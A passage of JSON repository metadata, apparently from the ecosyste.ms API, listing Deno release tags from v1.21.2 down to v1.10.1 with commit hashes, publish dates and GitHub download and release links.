_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F